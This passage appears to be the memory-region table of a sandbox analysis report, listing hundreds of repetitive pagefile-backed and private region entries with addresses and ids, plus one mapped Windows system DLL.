region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7244 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7245 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7246 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7247 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7248 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7249 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7250 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7251 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7252 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7253 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7254 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7255 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7256 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7257 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7258 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7259 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7260 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7261 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7262 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7263 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7284 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7285 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7286 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7287 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7288 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7292 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7293 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7294 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7295 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7330 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7331 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7332 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7333 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7334 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7336 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7337 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7341 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7342 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7343 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7344 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7345 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7346 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7353 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7354 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7356 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7357 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 7358 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7359 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7362 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 7363 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 7364 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7365 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7366 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7367 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7368 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7369 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7370 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7371 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7372 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7373 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7374 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7375 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7376 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7377 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7378 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7379 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7380 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7381 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7382 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7383 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7384 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7385 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7386 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7387 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7388 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7389 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7390 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7391 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7392 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7393 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7394 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7395 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7396 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7397 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7398 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7399 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7400 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7401 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7402 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7403 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7404 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7405 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7406 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7407 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 7408 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 7409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 7428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 